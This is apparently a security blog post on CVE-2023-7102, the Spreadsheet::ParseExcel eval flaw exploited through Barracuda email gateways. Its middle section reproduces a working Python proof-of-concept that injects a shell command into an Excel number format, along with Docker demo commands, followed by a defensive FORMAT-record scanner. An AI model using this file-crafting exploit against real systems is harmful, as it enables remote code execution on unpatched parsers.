Decoding the Barracuda Networks’ CVE-2023-7102 Vulnerability

In the ever-evolving landscape of cybersecurity, new vulnerabilities emerge that challenge the robustness of our digital defenses.

One such recent discovery is CVE-2023-7102, a significant Arbitrary Code Execution (ACE) vulnerability found in Barracuda Networks’ Email Security Gateway (ESG) appliances.

This blog post will delve into the intricacies of this vulnerability, its potential impact, and the steps taken to mitigate its effects.

We’ll explore how it works, why it’s a concern, and what you can do to protect your systems.

Understanding the Risks

A newly discovered Arbitrary Code Execution (ACE) vulnerability, identified as CVE-2023-7102, has been located in Barracuda Networks’ Email Security Gateway (ESG) Appliances.

This potential exploit could enable cybercriminals to remotely execute arbitrary commands on the ESG appliance through a simple email containing a malicious Excel file.

The full Confidentiality, Integrity, and Availability (CIA) triad could be significantly impacted by this exploit.

Publicly available proof-of-concept exploits for this vulnerability have already begun to circulate, and threat actors are actively exploiting it in the wild.

A Deeper Look: Description of CVE-2023-7102 Vulnerability

CVE-2023-7102 is rooted in the use of a third-party Perl module, Spreadsheet::ParseExcel. This module is used by the Amavis virus scanner within Barracuda’s ESG appliances to analyze Microsoft Excel files.

The vulnerability lies in the fact that Spreadsheet::ParseExcel allows arbitrary code execution because it passes unvalidated input read from the file into a string-type eval. This permits an attacker to execute arbitrary commands on any system where an Excel file is parsed with the Spreadsheet::ParseExcel module.

When a cyber attacker sends a maliciously crafted Excel file to a susceptible Barracuda ESG Appliance, they can run arbitrary code on the appliance.

This arbitrary code execution is triggered by the Amavis virus scanner within an ESG appliance, which relies on Spreadsheet::ParseExcel to evaluate the Excel files attached to an email.

The vulnerability within the Spreadsheet::ParseExcel module itself is cataloged as CVE-2023-7101. The use of this outdated third-party component within Barracuda’s ESG appliance is cataloged separately as CVE-2023-7102.

Barracuda Networks, in collaboration with Mandiant, has been investigating the exploitation of CVE-2023-7102. Their findings reveal that the vulnerability has been exploited on a limited number of ESG devices to deploy new variants of the SEASPY and SALTWATER malware.

Who is Affected?

Affected are Spreadsheet::ParseExcel version 0.65 and every product that depends on it, such as Spreadsheet::ParseXLSX.

The Impact of the Vulnerability

The vulnerability carries a high impact, allowing for Arbitrary Code Execution.

In situations where documents provided by a remote machine are being parsed, this could potentially lead to Remote Code Execution (RCE).

Exploitability of the Vulnerability

The exploitability of this vulnerability is also high.

Threat actors can exploit this vulnerability by using specially crafted Number format strings within XLS and XLSX files, causing the execution of arbitrary code during the parsing process.

Understanding CVE-2023-7102: A Guide

Here, we will provide a simplified guide on how to understand this vulnerability using a proof-of-concept (POC) example available on GitHub.

XLS Payload Python Script:

xls = open('test.xls', 'rb').read()

# Inject shell to format string. The template workbook must already carry a
# custom number format whose text is a quoted run of "a" characters of the
# same length as the payload, so that the record length does not change.
shell = "system('whoami > /tmp/inject.txt')"
fmtStr = f'[>123;{shell}]123'
pattern = f'"{"a" * (len(fmtStr) - 2)}"'
print(pattern)

l = xls.find(pattern.encode())  # find() returns -1; index() would raise instead
assert l != -1, 'Pattern must exist'
r = l + len(pattern)

# In a BIFF8 FORMAT record the string is preceded by cch (2 bytes) and a flag
# byte; before those sits the 2-byte format index (ifmt) reused below.
fmtIdx = xls[l - 5:l - 3]

xls = xls[:l] + fmtStr.encode() + xls[r:]

# Apply format string to xf
XF_opcode_w_len = b'\xe0\x00\x14\x00'  # Assume highest BIFF version
l = xls.find(XF_opcode_w_len)  # First XF record found is XF index 0
assert l != -1, 'XF must exist'
xls = xls[:l + 6] + fmtIdx + xls[l + 8:]  # ifmt sits at offset 6 of the XF record

# Apply format to cell
RK_opcode = b'\x7e\x02'
l = xls.find(RK_opcode)
assert l != -1, 'RK (numeric/date) cell must exist'
l += 8  # skip record header (4), row (2) and column (2) to reach ixfe

xls = xls[:l] + b'\x00\x00' + xls[l + 2:]  # ixfe = 0: the XF patched above

open('test.xls', 'wb').write(xls)

Step 1: Memory Corruption

The first part of the POC focuses on demonstrating memory corruption. For this, a Docker image is built and run in the /bomb folder.

The command used here is:

docker build -t perl-xlsx-bomb . && docker run --name perl-xlsx-bomb -m 4g -d perl-xlsx-bomb

In this command, -t perl-xlsx-bomb assigns a name to the new Docker image, while --name perl-xlsx-bomb names the Docker container. The -m 4g flag limits the memory available to the container to 4 GB. The container keeps filling memory, including swap, until it is terminated for resource exhaustion.

Step 2: Remote Code Execution (RCE)

The second part of the POC focuses on remote code execution. Again, a Docker image is built and run, but this time in the /rce folder. The command used is:

docker build -t parseexcel-rce . && docker run parseexcel-rce

Each Perl run writes ‘root’ (the output of the injected whoami command) to /tmp/inject.txt, demonstrating successful arbitrary code execution.

Technical Details of the Vulnerability

Spreadsheet::ParseExcel is a Perl module designed for parsing Excel files. The identified vulnerability is rooted in the way Spreadsheet::ParseExcel handles unvalidated input from a file, passing it into a string-type “eval”.

More specifically, the issue arises from the evaluation of Number format strings (not to be confused with printf-style format strings) within the Excel parsing logic.
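Because the dangerous input is the Number format string carried in the workbook’s FORMAT records, a defender can inspect those records directly, without ever evaluating them. The script below is an added example written for this post, not code from the proof-of-concept or from Spreadsheet::ParseExcel. It walks a raw BIFF8 record stream, decodes each FORMAT record (opcode 0x041E: a 2-byte format index followed by an XLUnicodeString), and flags any format whose bracket sections contain anything other than the tokens a legitimate Excel number format uses (colours, numeric conditions such as [>123], locale/currency codes such as [$-409], and elapsed-time codes). The allowlist is an assumption of this example, the sample records are constructed inline, and the input is assumed to be the BIFF record stream rather than the OLE2 container that normally wraps it in a .xls file.

```python
from __future__ import annotations

import re
import struct

FORMAT_OPCODE = 0x041E  # BIFF FORMAT record (custom number format)
EOF_OPCODE = 0x000A     # BIFF EOF record

# Bracket sections a genuine Excel number format may contain (assumed allowlist):
# colours, numeric conditions, locale/currency codes, elapsed-time tokens.
_ALLOWED_BRACKET = re.compile(
    r"^(?:"
    r"(?:Black|Blue|Cyan|Green|Magenta|Red|White|Yellow|Color\d{1,2}|DBNum\d)"
    r"|(?:<=|>=|<>|<|>|=)-?\d+(?:\.\d+)?"
    r"|\$[^\]]*"
    r"|[hms]+"
    r")$",
    re.IGNORECASE,
)


def iter_biff_records(stream: bytes):
    """Yield (opcode, data) for each record in a raw BIFF record stream."""
    off = 0
    while off + 4 <= len(stream):
        opcode, length = struct.unpack_from("<HH", stream, off)
        yield opcode, stream[off + 4: off + 4 + length]
        off += 4 + length
        if opcode == EOF_OPCODE:
            break


def decode_format_record(data: bytes) -> tuple[int, str]:
    """Decode a BIFF8 FORMAT record body: ifmt, then cch, flags and the text."""
    ifmt, cch, flags = struct.unpack_from("<HHB", data, 0)
    if flags & 0x01:  # fHighByte set: characters are UTF-16LE
        text = data[5:5 + 2 * cch].decode("utf-16-le", errors="replace")
    else:             # compressed: one byte per character
        text = data[5:5 + cch].decode("latin-1")
    return ifmt, text


def bracket_sections(fmt: str) -> list[str]:
    """Return the content of every [...] section, ignoring quoted literals."""
    sections, i = [], 0
    while i < len(fmt):
        ch = fmt[i]
        if ch == '"':               # skip "literal text"
            j = fmt.find('"', i + 1)
            i = len(fmt) if j == -1 else j + 1
        elif ch == "\\":            # skip an escaped character
            i += 2
        elif ch == "[":
            j = fmt.find("]", i + 1)
            sections.append(fmt[i + 1:] if j == -1 else fmt[i + 1:j])
            i = len(fmt) if j == -1 else j + 1
        else:
            i += 1
    return sections


def suspicious_format(fmt: str) -> bool:
    """True when any bracket section is not a colour, condition, locale or time token."""
    return any(not _ALLOWED_BRACKET.match(s) for s in bracket_sections(fmt))


def scan_biff_stream(stream: bytes) -> list[tuple[int, str]]:
    """Return (ifmt, text) for every FORMAT record whose string looks injected."""
    hits = []
    for opcode, data in iter_biff_records(stream):
        if opcode == FORMAT_OPCODE and len(data) >= 5:
            ifmt, text = decode_format_record(data)
            if suspicious_format(text):
                hits.append((ifmt, text))
    return hits


def make_format_record(ifmt: int, text: str) -> bytes:
    """Build a BIFF8 FORMAT record with a compressed string (test data only)."""
    body = struct.pack("<HHB", ifmt, len(text), 0) + text.encode("latin-1")
    return struct.pack("<HH", FORMAT_OPCODE, len(body)) + body


# Constructed sample stream: two benign custom formats and one carrying the
# injection shape shown in the proof-of-concept above.
SAMPLE_STREAM = (
    make_format_record(164, "[Red]#,##0.00;[Blue]-#,##0.00")
    + make_format_record(165, '[>123]"big";[<=123]"small"')
    + make_format_record(166, "[>123;system('whoami > /tmp/inject.txt')]123")
    + struct.pack("<HH", EOF_OPCODE, 0)
)

if __name__ == "__main__":
    for ifmt, text in scan_biff_stream(SAMPLE_STREAM):
        print(f"suspicious FORMAT record ifmt={ifmt}: {text!r}")
```

To run this over a real .xls attachment, extract the Workbook stream from the OLE2 container first (for example with the olefile package) and pass its bytes to scan_biff_stream; the check is purely structural, so it is safe to run on untrusted mail at the gateway or in a sandbox without invoking the vulnerable parser.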

Mitigation Measures

In response to the discovery of the Arbitrary Code Execution (ACE) vulnerability arising from its ESG appliances’ use of Spreadsheet::ParseExcel, identified as CVE-2023-7102, Barracuda Networks took swift action.

On December 21, 2023, a security upgrade was rolled out to all active Barracuda Email Security Gateway (ESG) devices. This update was designed to address this specific ACE vulnerability and was automatically implemented across the board, eliminating the need for any customer-initiated actions.

However, the story did not end there. Following the initial exploitation of the ACE vulnerability by the threat entity referred to as UNC4841, Barracuda noticed the introduction of new iterations of both SEASPY and SALTWATER malware. These were found on a restricted number of ESG devices.

To remediate the compromised devices that showed indicators of compromise linked to these newly detected malware variants, Barracuda issued a further patch on December 22, 2023.

The effective response from Barracuda underscores the importance of timely and proactive measures in the face of new cybersecurity threats.

By rapidly deploying updates and patches, it is possible to mitigate the potential damage caused by vulnerabilities like CVE-2023-7102.

Conclusion

Understanding vulnerabilities like CVE-2023-7102 is crucial in today’s digital world.

It’s not just about knowing they exist, but understanding their mechanisms, potential impacts, and ways to mitigate them.

As we’ve seen, CVE-2023-7102 is a potent vulnerability with high exploitability and significant potential for damage.